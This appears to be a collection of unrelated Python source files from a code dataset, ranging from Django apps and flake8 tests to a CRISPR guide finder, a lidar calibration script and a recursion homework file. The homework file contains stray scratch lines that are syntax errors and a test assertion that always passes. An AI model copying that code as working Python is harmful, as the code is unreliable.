mat = bpy.data.materials.get(base_obj.get('unmask_material'))
obj_scene = bpy.data.objects.get(name)
obj_scene.active_material = mat
for i, ms in enumerate(obj_scene.material_slots):
mat_name = base_obj['material_slots_defaults'][i]
mat = bpy.data.materials.get(mat_name)
ms.material = mat
def set_ground(self, idx):
for name, base_obj in self.ground_objects.items():
mat_name = base_obj.get('ground_materials')[idx]
base_obj['unmask_material'] = mat_name
bpy.data.objects.get(name).active_material = bpy.data.materials.get(mat_name)
def randomize(self):
ridx = random.randint(0, len(self.ground_materials)-1)
self.set_ground(ridx)
def cleanup(self):
'''Reset preferences'''
for name, base_obj in self.ground_objects.items():
mat_name = base_obj.get('default_material')
log.debug(f'restore {name} to {mat_name}')
bpy.data.objects.get(name).active_material = bpy.data.materials.get(mat_name)
mat_name_cfg = base_obj.get('colorfill_material')
if mat_name_cfg in bpy.data.materials.keys():
bpy.data.materials.remove(bpy.data.materials.get(mat_name_cfg))
@property
def iterations(self):
return self._iterations
|
994,954 | 388404e0ae54aae34178bdc22ad03b29c2f6741d | clusters = [('seq1',), ('seq2',), ('seq3',), ('seq4',), ('seq5',)]
merges = (('seq3',), ('seq4',))
temp_subcluster = ()
for items in [merges][-1]:
if type(items) is tuple:
for elements in items:
temp_subcluster += (elements,) # merge sub sub clusters into one
else:
temp_subcluster += (items,) |
994,955 | ba159673fb165939df0429747f1d8edb21d9751d | from rest_framework import serializers
class ProfileSerializer(serializers.Serializer):
id = serializers.IntegerField()
username = serializers.CharField()
last_login = serializers.DateTimeField()
login_count = serializers.IntegerField()
project_count = serializers.IntegerField()
|
994,956 | ba2606e8b5ea8c7a411adc9fe594316c599b19d1 | ### Chapter 11: Testing Your Code
## Testing a Class
# A Class to Test (Cont'd)
from survey import AnonymousSurvey
""" Define a question and start a survey. """
question = "What language did you first learn to speak? "
my_survey = AnonymousSurvey(question)
""" Show the question and store responses to the question. """
my_survey.show_question()
print('Enter \'q\' at any time to quit.')
while True:
response = input('Language: ')
if response == 'q':
break
my_survey.store_response(response)
""" Show the survey results. """
print('Thank you to everyone who participated in the survey!')
my_survey.show_results() |
994,957 | 2f345ddbcac1a2e6eb5cde2da7a2ce9a9535fc95 | #!/usr/bin/env python3
#Name: Jasrajveer Malhi (jmalhi)
"""
The program PAMfinder uses a fasta file input and will output a text file containg the 20 nucleotide sequence adjacent to PAM sequence (NGG).
The general flow of the program is to first run through all six reading frames to identify the 'NGG' sequence then print out the corresponding
guide sequence. This guide sequence can then be useful for designing a CRISPR guides.
"""
class FastAreader :
def __init__ (self, file):
'''contructor: saves attribute fname '''
self.file = file
def readFasta (self):
''' Read an entire FastA record and return the sequence header/sequence'''
header = ''
sequence = ''
headerList = []
sequenceList = []
for line in self.file:
if line[0] == ">":
headerList.append(line.strip("\n"))
if header:
sequenceList.append(sequence)
header = line
sequence = ''
else:
sequence+=line.strip("\r\n")
sequenceList.append(sequence)
return (headerList,sequenceList)
class PAMfinder:
"""The class PAMfinder will run through all six reading frames of the DNA sequence, find the 'NGG' sequence and set all the values
for the forward strand to listofPAMS and for the reverse they are set to listofReversedPAMS."""
def __init__(self,sequenceList):
self.headers = sequenceList[0] # Initialize the first value, it is the header.
self.sequences = sequenceList[1] # Initialize the second value, this contains the sequence itself.
self.reversedSequenceList = [] # Initialize a list that will store the reverse sequence.
self.listofPAMS = [] # Initialize the list for the forward PAM sequences.
self.listofReversedPAMS = [] # Initialize the list of reverse PAM sequences.
def classController(self):
"""The controller will be used for requests made, and the class will grab
the apropriate models. In this case the controller would grab the headers,
list of PAMS, ad the reverse list. """
import sys
for i in range(0,len(self.headers)):
self.reverser(i)
self.findPAMs(i)
return (self.headers,self.listofPAMS,self.listofReversedPAMS)
def reverser(self,i):
"""Reverser is necessary because we are looking at all 6 reading frames, so the bottom
strand positions need to be counted in a reversed manner where the positions will be corelating
to the 5' position."""
import sys
counter = 0
reversedSeq = list(self.sequences[i][::-1]) # Create a reversed list that will allow for counting to be done relative to forward strand.
for character in reversedSeq: # Assign the corresponding reveresed values.
if character == "A":
reversedSeq[counter] = "T"
elif character == "T":
reversedSeq[counter] = "A"
elif character == "C":
reversedSeq[counter] = "G"
else:
reversedSeq[counter] = "C"
counter+=1
reversedSeq = "".join(reversedSeq) # After the sequence is reversed, join all the values togther.
self.reversedSequenceList.append(reversedSeq) # Add the reversedSeq to the end of the reversedSequenceList.
def findPAMs(self,i):
"""FindPAMS is used to find the PAM sequence and add it to the lists created for
the forward and reverse strand along with the corresponding positions. """
import sys
listofPAMS = [] # Create a list for the PAM sequences.
listofReversedPAMS = [] # Create a list for the reverse PAM sequences.
counter = 0 # This counter starts for the forward sequences.
for nucleotide in self.sequences[i]:
if nucleotide == "G" and self.sequences[i][counter-1] == "G":
if counter > 23: # Have a set length that is 23 or greater to pass it on.
listofPAMS.append((self.sequences[i][counter-22:counter-2],counter-1)) # Add the sequence with the correct position to the list.
counter+=1
counter = 0 # This counter starts for the reverse sequences
for nucleotide in self.reversedSequenceList[i]: # Looking for the sequence in the reversed list.
if nucleotide == "G" and self.reversedSequenceList[i][counter-1] == "G":
if counter > 23:
listofReversedPAMS.append((self.reversedSequenceList[i][counter-22:counter-2],len(self.reversedSequenceList[i])-counter+2))
counter+=1
self.listofPAMS.append((listofPAMS)) # Add to the the forward sequences to the list.
self.listofReversedPAMS.append((listofReversedPAMS[::-1])) # Add the reverse sequence lists to the lists for reverse sequences.
def main():
"""The main is used to print the values in a specific format. The forward and reverse sequences
will be printed onto a text file called Guide Sequences. Along with the text file, the output will
be displayed on terminal or wherever the code is being run. """
import sys
listofSequences = FastAreader(sys.stdin).readFasta()
PAMSequences = PAMfinder(listofSequences).classController() # Calls on controller class to return desired models.
f = open('Guide Sequences.txt','w')
for i in range(len(PAMSequences[0])):
f.write(PAMSequences[0][i]) # Prints the header sequence into the file.
f.write('\n')
print(PAMSequences[0][i])
for j in range(len(PAMSequences[1][i])):
if j == 0:
f.write("Forward Strand PAM Sites:")
f.write('\n')
print("Forward Strand PAM Sites:")
print(PAMSequences[1][i][j]) # Prints the forward sequences
y = str(PAMSequences[1][i][j]) # Changes from int to string characters.
x = ''.join(y) # Joining all the string values so we can print to file.
f.write(x) # Write the joined forward sequences to the file.
f.write('\n')
for k in range(len(PAMSequences[2][i])): # For reverse sequences, and follows same logic as forward.
if k == 0:
f.write("Reverse Strand PAM Sites (in reference to the Top Strand Position):")
f.write('\n')
print("Reverse Strand PAM Sites (in reference to the Top Strand Position):")
print(PAMSequences[2][i][k]) # Prints the reverse sequences with the corresponding positions.
a = str(PAMSequences[2][i][k]) # Changes the integer to string characters, allowing for the values to join.
b = ''.join(a)
f.write(b) # Write all of the reverse sequences onto the text file with their positions.
f.write('\n')
f.close() # Close the file.
main()
|
994,958 | 5de5703137f9bd6fe9c9c192bad5700e4512a6cd | import setuptools
version = '1.0.0'
setuptools.setup(
name='Mtns electrumX',
version=version,
scripts=['electrumx_server', 'electrumx_rpc', 'electrumx_compact_history'],
python_requires='>=3.6',
install_requires=['aiorpcX>=0.10.1,<0.11', 'attrs',
'plyvel', 'pylru', 'aiohttp >= 2'],
extras_require={
'rocksdb': ['python-rocksdb>=0.6.9'],
'uvloop': ['uvloop>=0.12.2'], # Bump when the uvloop connection_lost bug is fixed
# For various coins
'blake256': ['blake256>=0.1.1'],
'crypto': ['pycryptodomex>=3.8.1'],
'groestl': ['groestlcoin-hash>=1.0.1'],
'tribus-hash': ['tribus-hash>=1.0.2'],
'xevan-hash': ['xeven-hash'],
'x11-hash': ['x11-hash>=1.4'],
'zny-yespower-0-5': ['zny-yespower-0-5'],
'mtns_skein_hash': ['mtns_skein-hash'],
},
packages=setuptools.find_packages(include=('electrumx*',)),
description='ElectrumX MTNS Server',
author='mtnsdev',
author_email='git@omotenashicoin.site',
license='MIT Licence',
url='https://github.com/omotenashicoin-project/electrumx.git',
long_description='Server implementation for the Electrum protocol',
download_url=('https://github.com/omotenashicoin-project/electrumx/archive/'
f'{version}.tar.gz'),
classifiers=[
'Development Status :: 5 - Production/Stable',
'Framework :: AsyncIO',
'License :: OSI Approved :: MIT License',
'Operating System :: Unix',
"Programming Language :: Python :: 3.6",
"Topic :: Database",
'Topic :: Internet',
],
)
|
994,959 | 4de48e3bf481c00ce0107245879c0e1b79c4d0a8 | from blog import app
from blog.views import socketio
if __name__ == '__main__':
socketio.run(app, debug=True) |
994,960 | a7a7252cd0685c9ee7ed5989990b4aa30a5e627b | #5. Реализовать структуру «Рейтинг», представляющую собой не возрастающий набор натуральных чисел.
# У пользователя необходимо запрашивать новый элемент рейтинга.
# Если в рейтинге существуют элементы с одинаковыми значениями, то новый элемент с тем же значением должен разместиться после них.
# Подсказка. Например, набор натуральных чисел: 7, 5, 3, 3, 2.
# Пользователь ввел число 3. Результат: 7, 5, 3, 3, 3, 2.
# Пользователь ввел число 8. Результат: 8, 7, 5, 3, 3, 2.
# Пользователь ввел число 1. Результат: 7, 5, 3, 3, 2, 1.
# Набор натуральных чисел можно задать непосредственно в коде, например, my_list = [7, 5, 3, 3, 2].
rating = [7 , 5 , 3 , 3 , 3 , 2]
overseer = False #Задаем переменную, которая меняется с False на True при определенных условиях
new_element = int(input('Введите новый элемент рейтинга: '))
for element in rating[:]:
if new_element >= element: #Сравниваем значение, которое ввел пользователь с каждым элементом списка
rating.insert(rating.index(element) , new_element)
overseer = True
break
if overseer == False:
rating.insert(0, new_element) #Добавляем элемент в начало списка, если нет совпадений
print(rating)
|
994,961 | 93a60102cb77330840e8df8874eccbee35892436 | import math
primes = {}
def is_prime(n):
global primes
if primes.get(n, False) == True:
return True
if n % 2 == 0 and n > 2:
return False
return all(n % i for i in range(3, int(math.sqrt(n)) + 1, 2))
t = int(raw_input())
while t > 0:
input_range = raw_input()
start = int(input_range.split(' ')[0])
end = int(input_range.split(' ')[1])
count = end - start + 1
while start <= end:
if is_prime(start) == True:
primes.update({start: True})
count = count - 1
start = start + 1
print count
t = t - 1 |
994,962 | d96dec24cfbb34b44400996158f095a3836b5329 | import random
from Save import Save
class Word:
def __init__(self):
"""Initialisation: download the actual version of data.json
"""
d = Save("")
self.dico = d.download()
def getDico(self):
return self.dico
def pickWord(self):
print("A Word is picked")
key = random.choice(list(self.dico))
return key ,self.dico[key]
def compareWord(self,key,word):
word = word.lower()
counter = 0
for letter in range(len(word)):
if self.dico[key][0][letter] == word[letter]:
counter += 1
if counter >= len(self.dico[key][0])-2:
return True
else:
return False
def updateWord(self,word,point):
word = word.lower()
if point:
self.dico[word][1] += 1
else:
self.dico[word][2] += 1
d = Save(self.getDico())
d.upload()
def deleteWord(self,word):
word = word.lower()
try:
self.dico.pop(word)
except KeyError:
print("Word does not exist on database")
pass
d = Save(self.getDico())
d.upload()
def newWord(self,de,fr):
de = de.lower()
fr = fr.lower()
print("New Word learned: {} for {}".format(de,fr))
try:
if self.dico[de]:
print("Word Already Exist")
pass
except KeyError:
print("Creating New Word")
self.dico[de] = [fr,0,0]
d = Save(self.getDico())
d.upload()
|
994,963 | edfae257380c9d8dbc5c2d4814bf9a067b005afe | # MIT License
#
# Copyright (c) 2020 Archis Joglekar
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from vlapy.core import field
import numpy as np
def test_field_solver():
nx = 96
kx_pert = 0.25
xmax = 2 * np.pi / kx_pert
dx = xmax / nx
axis = np.linspace(dx / 2, xmax - dx / 2, nx)
kx = np.fft.fftfreq(axis.size, d=dx) * 2.0 * np.pi
charge_densities = [
1.0 + np.sin(kx_pert * axis),
1.0 + np.cos(2 * kx_pert * axis),
1.0 + np.sin(2 * kx_pert * axis) + np.cos(8 * kx_pert * axis),
]
electric_fields = [
np.cos(kx_pert * axis) / kx_pert,
-np.sin(2 * kx_pert * axis) / 2.0 / kx_pert,
np.cos(2 * kx_pert * axis) / 2.0 / kx_pert
- np.sin(8 * kx_pert * axis) / 8.0 / kx_pert,
]
for actual_field, charge_density in zip(electric_fields, charge_densities):
test_field = field.solve_for_field(charge_density=1.0 - charge_density, kx=kx)
np.testing.assert_almost_equal(actual_field, test_field, decimal=4)
|
994,964 | 18cad137f850c4b166ce5940b87cc68683eeed82 | INSERT_DATA_NUM = 1000 # develop_modeでinsertする数
MAX_QUERY_SIZE = 500_000 # 500KB
MAX_SELECT_RECORD = 500
MAX_MECAB_PARSE_NUM = 500 # 500回
|
994,965 | b41f0aef3baed287772a5e311b9a360bf600e7aa | # -*- coding: utf-8 -*-
"""
Created on Sat Feb 25 21:16:25 2017
@author: User
"""
from docx import Document
def createTable():
doc = Document()
table = doc.add_table(rows=9,cols = 9)
cell = table.cell(0,1)
cell.text = "work"
doc.save("F:/test.docx")
createTable() |
994,966 | 9f4861a026de8658bb790e5536c2c419c290587c | from homeassistant.components.hive import * |
994,967 | fbcb63f7b5f354b57e8806c18d163158b1d9d1ba | #Linear metadata model for testing purposes
from comet_ml import Experiment
import tensorflow as tf
from DeepTreeAttention.trees import AttentionModel
from DeepTreeAttention.models import metadata
from DeepTreeAttention.callbacks import callbacks
import pandas as pd
model = AttentionModel(config="/home/b.weinstein/DeepTreeAttention/conf/tree_config.yml")
model.create()
#Log config
experiment = Experiment(project_name="neontrees", workspace="bw4sz")
experiment.log_parameters(model.config["train"])
experiment.log_parameters(model.config["evaluation"])
experiment.log_parameters(model.config["predict"])
experiment.add_tag("HSI")
##Train
#Train see config.yml for tfrecords path with weighted classes in cross entropy
model.read_data()
class_weight = model.calc_class_weight()
##Train subnetwork
experiment.log_parameter("Train subnetworks", True)
with experiment.context_manager("HSI_spatial_subnetwork"):
print("Train HSI spatial subnetwork")
model.read_data(mode="HSI_submodel")
model.train(submodel="spatial", sensor="hyperspectral",class_weight=[class_weight, class_weight, class_weight], experiment=experiment)
with experiment.context_manager("HSI_spectral_subnetwork"):
print("Train HSI spectral subnetwork")
model.read_data(mode="HSI_submodel")
model.train(submodel="spectral", sensor="hyperspectral", class_weight=[class_weight, class_weight, class_weight], experiment=experiment)
#Train full model
with experiment.context_manager("HSI_model"):
experiment.log_parameter("Class Weighted", True)
model.read_data(mode="HSI_train")
model.train(class_weight=class_weight, sensor="hyperspectral", experiment=experiment)
model.HSI_model.save("{}/HSI_model.h5".format(save_dir))
#Get Alpha score for the weighted spectral/spatial average. Higher alpha favors spatial network.
if model.config["train"]["HSI"]["weighted_sum"]:
estimate_a = model.HSI_model.get_layer("weighted_sum").get_weights()
experiment.log_metric(name="spatial-spectral weight", value=estimate_a[0][0]) |
994,968 | eff7e3f450310e9c7dfb62b0d148fcffc964ffea | """Tests for the flake8.style_guide.StyleGuide class."""
from __future__ import annotations
import argparse
from unittest import mock
import pytest
from flake8 import statistics
from flake8 import style_guide
from flake8 import utils
from flake8.formatting import base
def create_options(**kwargs):
"""Create and return an instance of argparse.Namespace."""
kwargs.setdefault("select", [])
kwargs.setdefault("extended_default_select", [])
kwargs.setdefault("extended_default_ignore", [])
kwargs.setdefault("extend_select", [])
kwargs.setdefault("ignore", [])
kwargs.setdefault("extend_ignore", [])
kwargs.setdefault("disable_noqa", False)
kwargs.setdefault("enable_extensions", [])
kwargs.setdefault("per_file_ignores", [])
return argparse.Namespace(**kwargs)
def test_handle_error_does_not_raise_type_errors():
"""Verify that we handle our inputs better."""
formatter = mock.create_autospec(base.BaseFormatter, instance=True)
guide = style_guide.StyleGuide(
create_options(select=["T111"], ignore=[]),
formatter=formatter,
stats=statistics.Statistics(),
)
assert 1 == guide.handle_error(
"T111", "file.py", 1, 1, "error found", "a = 1"
)
def test_style_guide_manager():
"""Verify how the StyleGuideManager creates a default style guide."""
formatter = mock.create_autospec(base.BaseFormatter, instance=True)
options = create_options()
guide = style_guide.StyleGuideManager(options, formatter=formatter)
assert guide.default_style_guide.options is options
assert len(guide.style_guides) == 1
PER_FILE_IGNORES_UNPARSED = [
"first_file.py:W9",
"second_file.py:F4,F9",
"third_file.py:E3",
"sub_dir/*:F4",
]
@pytest.mark.parametrize(
"style_guide_file,filename,expected",
[
("first_file.py", "first_file.py", True),
("first_file.py", "second_file.py", False),
("sub_dir/*.py", "first_file.py", False),
("sub_dir/*.py", "sub_dir/file.py", True),
("sub_dir/*.py", "other_dir/file.py", False),
],
)
def test_style_guide_applies_to(style_guide_file, filename, expected):
"""Verify that we match a file to its style guide."""
formatter = mock.create_autospec(base.BaseFormatter, instance=True)
options = create_options()
guide = style_guide.StyleGuide(
options,
formatter=formatter,
stats=statistics.Statistics(),
filename=style_guide_file,
)
assert guide.applies_to(filename) is expected
def test_style_guide_manager_pre_file_ignores_parsing():
"""Verify how the StyleGuideManager creates a default style guide."""
formatter = mock.create_autospec(base.BaseFormatter, instance=True)
options = create_options(per_file_ignores=PER_FILE_IGNORES_UNPARSED)
guide = style_guide.StyleGuideManager(options, formatter=formatter)
assert len(guide.style_guides) == 5
expected = [
utils.normalize_path(p)
for p in [
"first_file.py",
"second_file.py",
"third_file.py",
"sub_dir/*",
]
]
assert expected == [g.filename for g in guide.style_guides[1:]]
@pytest.mark.parametrize(
"ignores,violation,filename,handle_error_return",
[
(["E1", "E2"], "F401", "first_file.py", 1),
(["E1", "E2"], "E121", "first_file.py", 0),
(["E1", "E2"], "F401", "second_file.py", 0),
(["E1", "E2"], "F401", "third_file.py", 1),
(["E1", "E2"], "E311", "third_file.py", 0),
(["E1", "E2"], "F401", "sub_dir/file.py", 0),
],
)
def test_style_guide_manager_pre_file_ignores(
ignores, violation, filename, handle_error_return
):
"""Verify how the StyleGuideManager creates a default style guide."""
formatter = mock.create_autospec(base.BaseFormatter, instance=True)
options = create_options(
ignore=ignores,
select=["E", "F", "W"],
per_file_ignores=PER_FILE_IGNORES_UNPARSED,
)
guide = style_guide.StyleGuideManager(options, formatter=formatter)
assert (
guide.handle_error(violation, filename, 1, 1, "Fake text")
== handle_error_return
)
@pytest.mark.parametrize(
"filename,expected",
[
("first_file.py", utils.normalize_path("first_file.py")),
("second_file.py", utils.normalize_path("second_file.py")),
("third_file.py", utils.normalize_path("third_file.py")),
("fourth_file.py", None),
("sub_dir/__init__.py", utils.normalize_path("sub_dir/*")),
("other_dir/__init__.py", None),
],
)
def test_style_guide_manager_style_guide_for(filename, expected):
"""Verify the style guide selection function."""
formatter = mock.create_autospec(base.BaseFormatter, instance=True)
options = create_options(per_file_ignores=PER_FILE_IGNORES_UNPARSED)
guide = style_guide.StyleGuideManager(options, formatter=formatter)
file_guide = guide.style_guide_for(filename)
assert file_guide.filename == expected
|
994,969 | 637c3058235ef8e34a5263f4e074fe6eb73f1c31 | # -*- coding: utf-8 -*-
"""
Created on Wed Mar 20 10:52:29 2019
HW9
@author: tianminz
"""
import math
#returns the alternating sum of the list
def alternatingSum(lst, depth = 0):
if len(lst) == 0:
return 0
elif len(lst) == 1:
return lst[0]
return lst[0] - lst[1] + alternatingSum(lst[2:])
#returns a list of tuples of the values that binary search
# must check to verify whether or not item is in lst.
def binarySearchValues(lst, item, low = 0):
if len(lst) == 0:
return []
high = len(lst)
mid = (high - 1) // 2
if item == lst[mid]:
return [(mid + low, lst[mid])]
#Recursion case
#add low to index
elif item < lst[mid]:
return [(mid + low, lst[mid])] + \
binarySearchValues(lst[:mid], item, low)
else:
return [(mid + low, lst[mid])] + \
binarySearchValues(lst[mid + 1 :], item, low + mid + 1)
#find the given item as a value in one of the path dictionaries.
#If the item is found, returns a list of keys that lead to the item;
#if it is not found, the function returns None.
def findCategoryPath(d, value):
for key, v in d.items():
if isinstance(v, dict):
res = findCategoryPath(v, value)
temp = [key]
if res is not None:
temp.extend(res)
return temp
else:
if value == v:
return [key]
#returns a list of the positive powers of 3 up to and including n
def powersOf3ToN(n):
value = math.floor(n)
#corner case
if value <= 0:
return []
elif value < 3:
return [1]
#recursive case
else:
return powersOf3ToN(value//3) + [powersOf3ToN(value//3) [-1] * 3]
powersOf3ToN(30)
powersOf3ToN(10) + [powersOf3ToN(10) [-1] * 3]
powersOf3ToN(3) + [powersOf3ToN(3) [-1] * 3] + [( powersOf3ToN(3) + [powersOf3ToN(3) [-1] * 3)] ) [-1] * 3]
powersOf3ToN(1) + [powersOf3ToN(1) [-1] * 3] + [ ( powersOf3ToN(1) + [powersOf3ToN(1) [-1] * 3] ) [-1] * 3]
[1] + [3] +
#returns a tuple of two lists
#The two lists must contain all the elements of lst between them
#and the difference between the two lists is as small as possible.
def loadBalance(lst):
lst.sort()
if len(lst) == 0:
return [], []
if len(lst) == 1:
return lst, []
t1,t2 = [],[]
while lst:
val = lst.pop()
if sum(t1)>sum(t2):
t2.append(val)
else:
t1.append(val)
return t1, t2
#returns a set of all balanced strings
# that can be created using n parentheses and no other characters
def generateValidParentheses(n):
if n == 0:
return set()
if n%2 == 1:
return set()
res = set()
genParents(res, n/2, n/2, "")
return res
def genParents(out, left, right, src):
if left == 0 and right == 0:
return out.add(src)
if left > 0:
genParents(out, left-1, right, src+"(")
if right > 0 and right > left:
genParents(out, left, right-1, src + ")")
# test function
def testalternatingSum():
print("Testing alternatingSum...")
assert(alternatingSum([1,2,3,4,5]) == 3)
assert(alternatingSum([1,7,3,10,0]) == -13)
assert(alternatingSum([11,71,3,1,20]) == -38)
assert(alternatingSum([11,71,3,1,20,18,3,4,29,20]) == -48)
assert(alternatingSum([]) == 0)
return "Done..."
def testbinarySearchValues():
print("Testing binarySearchValues...")
assert(binarySearchValues(['a', 'c', 'f', 'g', 'm', 'q'], 'c')\
== [(2, 'f'), (0, 'a'), (1, 'c')])
assert(binarySearchValues(['a', 'c', 'f', 'g', 'm', 'q'], 'n')\
== [(2, 'f'), (4, 'm'), (5, 'q')])
assert(binarySearchValues(['a', 'c', 'f', 'g', 'm', 'q'], 'g') \
== [(2, 'f'), (4, 'm'), (3, 'g')])
return "Done..."
def testfindCategoryPath():
d = { "Sporting" :
{ "Spaniel" :
{ "English Springer" : "Betsy" },
"Weimaraner" : "Xeva",
"Retriever" :
{ "Golden" : "Sammo",
"Labrador" : "Nya" }
},
"Working" :
{ "Husky" : "Stella",
"Saint Bernard" : "Rutherfurd",
"Boxer" : "Paximus" },
"Herding" :
{ "Corgi" :
{ "Welsh" :
{ "Cardigan" : "Geb",
"Pembroke" : "Niinja" }
},
"Sheepdog" :
{ "Bergamasco" : "Samur",
"Old English" : "Duggy",
"Shetland" : "Walker" }
},
"Other" : "Kimchee"
}
assert(findCategoryPath(d, "Samur") \
== ["Herding", "Sheepdog", "Bergamasco"])
assert(findCategoryPath(d, "Weimaraner") == None)
return "Done..."
def testloadBalance():
print("Testing loadBalance...")
assert(loadBalance([3, 6, 1, 7, 9, 8, 22, 3]) == \
([3, 6, 1, 7, 9, 3], [8, 22]) or ([3, 6, 9, 8, 3], [1, 7, 22]) )
return "Done..."
def testpowerOf3ToN():
print("Testing powerOf3ToN...")
assert(powersOf3ToN(10.5) == [1, 3, 9])
assert(powersOf3ToN(2187) == [1, 3, 9, 27, 81, 243, 729, 2187])
assert(powersOf3ToN(2000) == [1, 3, 9, 27, 81, 243, 729])
return "Done..."
def testgenerateValidParentheses():
print("Testing generateValidParentheses...")
assert(generateValidParentheses(4) == { "(())", "()()" })
assert(generateValidParentheses(6) == \
{ "((()))", "()(())", "(())()", "(()())", "()()()" })
assert(generateValidParentheses(0) == set())
return "Done..."
def testAll():
print(testalternatingSum())
print(testbinarySearchValues())
print(testfindCategoryPath())
print(testloadBalance())
print(testpowerOf3ToN())
print(testgenerateValidParentheses())
testAll()
|
994,970 | 618fafce5450ed0894b14de04bdf4eeb1a64a128 | from django.db import models
from django.contrib.auth.models import AbstractBaseUser
from django.conf import settings
from django.db.models.signals import post_save
from django.dispatch import receiver
from rest_framework.authtoken.models import Token
from django.contrib.auth.models import UserManager
class Tasks(models.Model):
tittle = models.CharField('Заголовок', max_length=75, unique=True)
type = models.CharField('Тип', max_length=5)
priority = models.CharField('Приоритет', max_length=15)
text = models.TextField('Описание')
status = models.CharField('Статус', max_length=40)
datetime_create = models.DateTimeField('Дата создания', auto_now_add=True)
datetime_update = models.DateTimeField('Дата изменения', auto_now=True)
creator = models.ForeignKey('Users', on_delete=models.CASCADE)
executor = models.CharField('Исполнитель', max_length=60, default=None)
def __str__(self):
return self.tittle
class Users(AbstractBaseUser):
role = models.CharField('Роль', max_length=40, default='Разработчик')
username = models.CharField('Имя пользователя', max_length=40, unique=True)
password = models.CharField('Пароль', max_length=30)
USERNAME_FIELD = 'username'
REQUIRED_FIELDS = []
objects = UserManager()
def __str__(self):
return self.username
@receiver(post_save, sender=settings.AUTH_USER_MODEL)
def create_auth_token(sender, instance=None, created=False, **kwargs):
if created:
Token.objects.create(user=instance)
|
994,971 | 1f29abbf191750ff5f1cedbd9acea7917dfc9001 | import numpy as np
import math
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.patches import Circle
import scipy
from mpl_toolkits.mplot3d import Axes3D
import time
from camera_capture import get_image
from velodyne_capture_v3 import init_velo_socket, get_pointcloud
import socket
def minmax_scale(x, i_min, i_max, o_min, o_max):
return (x-i_min)/float(i_max-i_min)*(o_max-o_min)+o_min
def get_calibration(pcl):
X= pcl[:,0]
Y= pcl[:,1]
Z= pcl[:,2]
distance = pcl[:,3]
# For matrix values
xr = 95 * math.pi/180
yr = 10 * math.pi/180
zr = 0 * math.pi/180
# start z by 90 y by -90
Xr = np.matrix([[1,0,0],[0,math.cos(xr),-1*math.sin(xr)],[0,math.sin(xr),math.cos(xr)]])
Yr = np.matrix([[math.cos(yr),0,math.sin(yr)],[0,1,0],[-1*math.sin(yr),0,math.cos(yr)]])
Zr = np.matrix([[math.cos(zr),-1*math.sin(zr),0],[math.sin(zr),math.cos(zr),0],[0,0,1]])
F = np.matrix([[935,0,0],[0,935,0],[225,375,1]])
#rotation matrix
R = np.matmul(Zr,Yr)
R= np.matmul(R,Xr)
# transpose matric
T = np.matrix([[1.1],[0],[-1.32]])
size= len(X)
X1= np.matrix.transpose(X)
Y1= np.matrix.transpose(Y)
Z1= np.matrix.transpose(Z)
A=[X1,Y1,Z1]
A= np.matrix([X1,Y1 ,Z1])
T1=np.matrix.transpose(T)
T2= np.repeat(T1,size,axis=0)
T2= np.matrix.transpose(T2)
c2 = np.matmul((F), (R))
c2 = .25*np.matmul((c2),(A+T2))
return c2
PORT = 2368
soc = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
soc.bind(('', PORT))
pcl = get_pointcloud(soc)
c2 = get_calibration(pcl)
xcenter = 307
ycenter = 207
B = np.square((c2[0,:]-xcenter)) + np.square((c2[1,:]-ycenter))
index = int(np.argmin(B, axis=1))
cmap = plt.get_cmap('brg')
pointsDist = np.asarray(distance)
pointsDist = np.round(minmax_scale(1.0/pointsDist,1.0/75,1.0/1.5,1,255).astype('uint8'))
pointsColor = np.array([cmap(1.0-pdist/255.0)[:3] for pdist in pointsDist])
plt.scatter(np.asarray(c2[0,:]), np.asarray(c2[1,:]), s=0.5, c=pointsColor)
circ = Circle((c2[0,index],c2[1,index]), 5, color='red')
ax.add_patch(circ)
print(distance[index])
plt.show() |
994,972 | 838f26df45377b837270811b0b7c4330603bafa8 | from django.conf.urls import url
from .import views
from accounts.views import LandingPageView
from django.contrib.auth.views import login, logout, password_reset, password_reset_done
from django.contrib.auth import views as auth_views
app_name = 'accounts'
urlpatterns = [
url(r'^$', LandingPageView.as_view(), name='landing_page'),
url(r'^login$', login, {'template_name': 'accounts/login.html'}, name='login'),
url(r'^logout$', logout, {'template_name': 'accounts/logout.html'}, name='logout'),
url(r'^register$', views.register, name='register'),
url(r'^profile$', views.profile, name='profile'),
url(r'^profile/edit$', views.edit_profile, name='edit_profile'),
url(r'^change-password$', views.change_password, name='change-password'),
url(r'^reset-password$', password_reset, name='reset_password'),
url(r'^reset_password_done$', password_reset_done, name='password_reset')
]
|
994,973 | 2087f6e89b2aebb028bb78c7cb83812d40ed0fa6 | n = int(input())
if n > 2:
print(n-2)
else:
print(1) |
994,974 | 904fbee2f4e53994fc86bd6f3847398dd1d3c0bb | # -*- coding: utf-8 -*-
"""
Created on Thu Sep 10 17:43:15 2020
@author: figonpiot
"""
# filtracja cyfrowa (DSP)
from matplotlib.pyplot import subplots, plot, xscale, xlim, show, close
from scipy.signal import firwin, chirp, lfilter
from numpy import linspace,pi,random
t = linspace(0,1,8001)
x = chirp(t,10,1,350,method='linear') + random.randn(8001)
b = firwin(32,0.1)
y = lfilter(b,1,x)
close()
# podstawowe nastawy dla wykresów
ax1 = plot(t,x,color='r')
ax2 = plot(t,y,color='k')
xscale("linear")
left, right = xlim()
xlim(left=0,right=0.5)
|
994,975 | 6428acd75d91e6225a1bc8664e116ba32e00d0de | import configparser
import requests
import sys
from os import path
def read_config():
"""
Read a config file from ``$HOME/.profrc``
We expect a file of the following form
[DEFAULT]
Baseurl = https://your-prof-instance
Login = username
"""
filename = path.join(path.expanduser('~'), '.profrc')
